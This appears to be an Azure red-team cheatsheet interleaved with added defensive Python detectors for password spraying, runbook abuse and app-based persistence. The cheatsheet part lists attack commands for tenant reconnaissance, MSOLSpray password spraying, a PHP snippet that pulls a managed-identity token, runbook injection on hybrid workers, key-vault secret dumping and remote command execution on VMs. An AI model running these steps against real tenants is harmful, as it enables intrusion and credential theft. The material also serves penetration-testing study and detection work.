Azure Redteam Cheatsheet

I. Reconnaissance (external)

Update: another useful tool is https://github.com/nyxgeek/o365recon

Find the subdomains of the target

Using MicroBurst

. .\Invoke-EnumerateAzureSubDomains.ps1
Invoke-EnumerateAzureSubDomains -Base <target> -Verbose

Enumerate valid email addresses:

o365creeper.py -f emails.txt -o validemails.txt

II. Reconnaissance (internal)

Using ROADtools

roadrecon auth -u <Email> -p <Password>
roadrecon gather
roadrecon gui

Using StormSpotter

python ssbackend.pyz
quasar.cmd serve -p 9091 --history

Using BloodHound and AzureHound

. C:\AzAD\Tools\AzureHound\AzureHound.ps1
Invoke-AzureHound -Verbose

III. Initial attack

Brute force

. .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList validemails.txt -Password test -Verbose
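The defender's side of the spray above, as an added example that is not part of the original cheatsheet: a small detector run over Azure AD sign-in records that separates a spray (one source, many accounts, one or two tries each) from a brute force against a single account. The field names follow the Microsoft Graph signIn resource; the records, the IP addresses and the contoso.example accounts are constructed sample data, and the thresholds are assumptions to tune per tenant.

```python
# Added example (not from the original cheatsheet): flag password-spray
# activity in Azure AD sign-in records. Field names follow the Microsoft
# Graph signIn resource; the records themselves are constructed sample data.
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Azure AD error code for "invalid username or password".
ERROR_INVALID_CREDENTIALS = 50126


def _signin(ts, upn, ip, error_code):
    """Build one constructed sign-in record in the Graph signIn shape."""
    return {"createdDateTime": ts, "userPrincipalName": upn,
            "ipAddress": ip, "status": {"errorCode": error_code}}


# Constructed sample data: one IP fails once against six different accounts
# (spray), one IP hammers a single account (brute force), and one user
# mistypes a password once and then succeeds (benign).
SAMPLE_SIGNINS = (
    [_signin(f"2024-01-10T08:0{i}:00Z", f"user{i}@contoso.example",
             "203.0.113.7", ERROR_INVALID_CREDENTIALS) for i in range(6)]
    + [_signin(f"2024-01-10T09:00:{i:02d}Z", "bob@contoso.example",
               "198.51.100.9", ERROR_INVALID_CREDENTIALS) for i in range(8)]
    + [_signin("2024-01-10T10:00:00Z", "carol@contoso.example",
               "192.0.2.5", ERROR_INVALID_CREDENTIALS),
       _signin("2024-01-10T10:00:30Z", "carol@contoso.example",
               "192.0.2.5", 0)]
)


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect_password_spray(events, min_distinct_users=5,
                          window=timedelta(minutes=30), max_attempts_per_user=2):
    """Return {ip: distinct_accounts} for source IPs whose failed sign-ins hit
    many different accounts inside `window` while touching each account only
    a few times. A brute force against one account (many failures, one user)
    is deliberately not matched; a lockout rule covers that case."""
    failures = defaultdict(list)
    for event in events:
        if event["status"]["errorCode"] == ERROR_INVALID_CREDENTIALS:
            failures[event["ipAddress"]].append(
                (parse_ts(event["createdDateTime"]),
                 event["userPrincipalName"].lower()))

    flagged = {}
    for ip, attempts in failures.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # Slide the window so attempts[start:end+1] spans at most `window`.
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            per_user = Counter(user for _, user in attempts[start:end + 1])
            if (len(per_user) >= min_distinct_users
                    and max(per_user.values()) <= max_attempts_per_user):
                flagged[ip] = max(flagged.get(ip, 0), len(per_user))
    return flagged


if __name__ == "__main__":
    for ip, count in detect_password_spray(SAMPLE_SIGNINS).items():
        print(f"possible password spray from {ip}: {count} distinct accounts")
```

The per-user cap is what keeps a single locked-out user from tripping the rule; lowering `min_distinct_users` catches slower, smaller sprays at the cost of more noise from shared NAT addresses.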

Illicit Consent Grant attack.

Using

IV. Lateral movement

Run the env command and look for IDENTITY_HEADER and IDENTITY_ENDPOINT (present when the App Service has a managed identity assigned); a token for the management API can be requested with this code:

<?php
// Ask the App Service managed identity endpoint for an ARM token.
// The shell expands $IDENTITY_ENDPOINT and $IDENTITY_HEADER from the environment.
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H "secret:$IDENTITY_HEADER"');
?>

Check Deployments

Get-AzResourceGroupDeployment -ResourceGroupName <Resource_group_name>

Save deployment template

Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <Resource_group_name> -DeploymentName <Deployment_Name>

VM interaction:

Access the VM using PSRemoting:

$password = ConvertTo-SecureString 'testpassword' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('testuser', $password)
$sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession -Session $sess

Transfer a file:

Copy-Item -ToSession $sess -Path tests.exe -Destination C:\Users\ -Verbose

Execute a command:

Invoke-Command -Session $sess -ScriptBlock {ls C:\Users\}

Using Hybrid Runbook Workers

List the Automation Hybrid Worker Groups:

Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName>

Import-AzAutomationRunbook -Name studentx -Path C:\AzAD\Tools\studentx.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Type PowerShell -Force -Verbose

Publish-AzAutomationRunbook -RunbookName studentx -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

Start-AzAutomationRunbook -RunbookName studentx -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose
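The import, publish and start sequence above leaves three Activity Log events from the same caller within a couple of minutes. As an added example that is not part of the original cheatsheet, this correlates those events per caller and automation account. The operation names are assumed from the Microsoft.Automation resource provider (verify them against your own Activity Log export), and the events, subscription id and contoso.example callers are constructed sample data.

```python
# Added example (not from the original cheatsheet): correlate Azure Activity
# Log events to spot a runbook being written, published and started in one
# short burst by a single caller. Operation names are assumed from the
# Microsoft.Automation resource provider; the events are constructed samples.
from collections import defaultdict
from datetime import datetime, timedelta

RUNBOOK_WRITE = "Microsoft.Automation/automationAccounts/runbooks/write"
RUNBOOK_PUBLISH = "Microsoft.Automation/automationAccounts/runbooks/publish/action"
JOB_WRITE = "Microsoft.Automation/automationAccounts/jobs/write"

# Placeholder subscription id for the constructed resource ids.
SCOPE = "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/Engineering"


def _event(ts, caller, operation, account, tail):
    """Build one constructed Activity Log entry."""
    return {"eventTimestamp": ts, "caller": caller, "operationName": operation,
            "resourceId": f"{SCOPE}/providers/Microsoft.Automation/automationAccounts/{account}/{tail}"}


SAMPLE_EVENTS = [
    # A caller pushes a new runbook and runs it within two minutes.
    _event("2024-01-10T12:00:00Z", "student1@contoso.example", RUNBOOK_WRITE, "HybridAutomation", "runbooks/studentx"),
    _event("2024-01-10T12:01:00Z", "student1@contoso.example", RUNBOOK_PUBLISH, "HybridAutomation", "runbooks/studentx"),
    _event("2024-01-10T12:02:00Z", "student1@contoso.example", JOB_WRITE, "HybridAutomation", "jobs/1111"),
    # Routine maintenance: a runbook edit in the morning, a job hours later, no publish.
    _event("2024-01-10T08:00:00Z", "ops@contoso.example", RUNBOOK_WRITE, "HybridAutomation", "runbooks/patching"),
    _event("2024-01-10T16:00:00Z", "ops@contoso.example", JOB_WRITE, "HybridAutomation", "jobs/2222"),
    # A scheduler that only starts jobs in another account.
    _event("2024-01-10T12:00:00Z", "scheduler@contoso.example", JOB_WRITE, "ProdAutomation", "jobs/3333"),
]


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def account_from_resource_id(resource_id):
    """Extract the automation account name from an ARM resource id, or None."""
    parts = resource_id.split("/")
    try:
        return parts[parts.index("automationAccounts") + 1]
    except (ValueError, IndexError):
        return None


def detect_runbook_deploy_and_run(events, window=timedelta(minutes=30)):
    """Return sorted (caller, automationAccount) pairs where one caller wrote,
    published and started a runbook job in the same account within `window`."""
    by_key = defaultdict(list)
    for event in events:
        account = account_from_resource_id(event["resourceId"])
        if account:
            by_key[(event["caller"], account)].append(
                (parse_ts(event["eventTimestamp"]), event["operationName"]))

    hits = []
    for key, ops in by_key.items():
        ops.sort()
        for t0, operation in ops:
            if operation != RUNBOOK_WRITE:
                continue
            # Everything this caller did in the account within `window` of the write.
            later = {op for t, op in ops if t0 <= t <= t0 + window}
            if RUNBOOK_PUBLISH in later and JOB_WRITE in later:
                hits.append(key)
                break
    return sorted(hits)


if __name__ == "__main__":
    for caller, account in detect_runbook_deploy_and_run(SAMPLE_EVENTS):
        print(f"runbook deployed and run by {caller} in {account}")
```

Legitimate CI pipelines produce the same sequence, so the useful follow-up is an allowlist of expected callers per automation account rather than a shorter window.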

Dump PRT

Using PRT in chrome

Abuse Dynamic group

Abuse proxy application

Check the Azure AD Connect authentication type:

Get-ADSyncConnector

Cloud to On-prem:

abuse PTA

obtain PRT cookie

Read more: https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/

The Global Administrator or Intune Administrator role can execute PowerShell scripts on an enrolled Windows device

On-prem to Cloud:

abuse PHS

V. Persistence

Add a new application that has high permissions and then use that for persistence
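An application planted for persistence shows up in the Azure AD audit log as a new credential on a service principal and, when it is given high permissions, as an app role grant. As an added example that is not part of the original cheatsheet, this scans audit records for both and singles out the service principals that received both in one review. The activity display names are assumed from Azure AD audit logs (check them against a real export), the Graph permission names are real but the set chosen is an assumption, and the events and contoso.example accounts are constructed sample data.

```python
# Added example (not from the original cheatsheet): find the Azure AD audit-log
# traces that app-based persistence leaves behind: new credentials on a service
# principal and grants of high-privilege Microsoft Graph app roles. Activity
# names are assumed from Azure AD audit logs; the events are constructed samples.
from collections import defaultdict

CREDENTIAL_ACTIVITY = "Add service principal credentials"
ROLE_GRANT_ACTIVITY = "Add app role assignment to service principal"

# Graph application permissions that let an app change directory roles, other
# apps or their permissions; a grant of any of these deserves review.
HIGH_PRIV_APP_ROLES = {
    "RoleManagement.ReadWrite.Directory",
    "Application.ReadWrite.All",
    "AppRoleAssignment.ReadWrite.All",
    "Directory.ReadWrite.All",
}


def _audit(ts, activity, actor, target, app_role=None):
    """Build one constructed audit record (a simplified Graph directoryAudit)."""
    return {"activityDateTime": ts, "activityDisplayName": activity,
            "initiatedBy": actor, "targetResource": target, "appRole": app_role}


SAMPLE_AUDIT = [
    _audit("2024-01-10T13:00:00Z", CREDENTIAL_ACTIVITY, "student1@contoso.example", "BackupSync"),
    _audit("2024-01-10T13:01:00Z", ROLE_GRANT_ACTIVITY, "student1@contoso.example", "BackupSync",
           "RoleManagement.ReadWrite.Directory"),
    _audit("2024-01-10T13:05:00Z", ROLE_GRANT_ACTIVITY, "ops@contoso.example", "Reporting", "User.Read.All"),
    _audit("2024-01-10T14:00:00Z", CREDENTIAL_ACTIVITY, "ops@contoso.example", "LegacyApp"),
    _audit("2024-01-10T14:10:00Z", "Update user", "ops@contoso.example", "carol@contoso.example"),
]


def find_app_persistence(events, high_priv_roles=HIGH_PRIV_APP_ROLES):
    """Return one finding dict per suspicious event: a credential added to a
    service principal, or a high-privilege app role granted to one."""
    findings = []
    for event in events:
        activity = event["activityDisplayName"]
        if activity == CREDENTIAL_ACTIVITY:
            findings.append({"kind": "credential-added", "actor": event["initiatedBy"],
                             "target": event["targetResource"], "detail": activity})
        elif activity == ROLE_GRANT_ACTIVITY and event.get("appRole") in high_priv_roles:
            findings.append({"kind": "privileged-app-role", "actor": event["initiatedBy"],
                             "target": event["targetResource"], "detail": event["appRole"]})
    return findings


def targets_with_both(findings):
    """Return, sorted, the service principals that received both a new credential
    and a privileged app role: the strongest signal of a planted backdoor app."""
    kinds = defaultdict(set)
    for finding in findings:
        kinds[finding["target"]].add(finding["kind"])
    return sorted(target for target, seen in kinds.items()
                  if {"credential-added", "privileged-app-role"} <= seen)


if __name__ == "__main__":
    found = find_app_persistence(SAMPLE_AUDIT)
    for finding in found:
        print(f"{finding['kind']}: {finding['actor']} -> {finding['target']} ({finding['detail']})")
    print("review first:", targets_with_both(found))
```

Credential additions alone are common during normal secret rotation, so the combined view in `targets_with_both` is the one to alert on; the single-event findings are better kept as a daily review list.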

Useful command:

Login:

az login -u test@test.onmicrosoft.com -p testpassword
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.onmicrosoft.com", $passwd)
Connect-AzureAD -Credential $creds

Azurehound

$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.onmicrosoft.com", $passwd)
Connect-AzAccount -Credential $creds
Connect-AzureAD -Credential $creds
.\AzureHound.ps1
Invoke-AzureHound -Verbose

Get all users

Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName   # only the UPNs

Show GAs

Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember

List all custom directory roles:

Import-Module AzureADPreview\AzureADPreview.psd1
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.com",$passwd)
Connect-AzureAD -Credential $creds
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} |select DisplayName

List resource (AzAD)

Get-AzResource

Get all the role assignments for the test user

Get-AzRoleAssignment -SignInName test@test.onmicrosoft.com
Get-AzRoleAssignment -Scope <Scope>

Check the definition of this role

Get-AzRoleDefinition -Name <Role_name>

List all the VMs where the current user has at least the Reader role

Get-AzVM | fl
or
az vm list

List all App Services. We filter on the 'Kind' property, otherwise both App Services and Function Apps are listed.

Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
az webapp list   # list all App Services
az webapp list --query "[].[name]" -o table   # list only the names of the App Services

To list Function Apps

Get-AzFunctionApp

list storage accounts

Get-AzStorageAccount | fl
az storage account list

List the key vaults readable by the current user, then the secrets in a vault and the value of one secret:

Get-AzKeyVault
az keyvault list
Get-AzKeyVaultSecret -VaultName <VaultName>
Get-AzKeyVaultSecret -VaultName <VaultName> -Name <Secret_name> -AsPlainText

Check if there is a user logged-in to az cli on that machine

az ad signed-in-user show

Check if there is a public IP address attached to the VM

Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_name> | select -ExpandProperty NetworkProfile

Get more details about the network interface attached to the VM using the below command

Get-AzNetworkInterface -Name <VM_interface>

Get the public IP address attached to the VM

Get-AzPublicIpAddress -Name <IP_name>

Get AzVM

Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_group_name> | fl *

Get information about the group and list its principals

Get-AzADGroup -DisplayName <Group_name>

Enumerate the service principals in Azure AD and find the service principal that a given AppId belongs to

Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<App_id>"} | fl

Disconnect

Disconnect-AzAccount

Check whether any extensions are already installed

Get-AzVMExtension -ResourceGroupName "Research" -VMName <VMName>

Run a PowerShell script on the VM from a local .ps1 file

Invoke-AzVMRunCommand -VMName <VMName> -ResourceGroupName <ResourceGroupName> -CommandId 'RunPowerShellScript' -ScriptPath 'test.ps1' -Verbose

Published by Nhat Truong

Hi
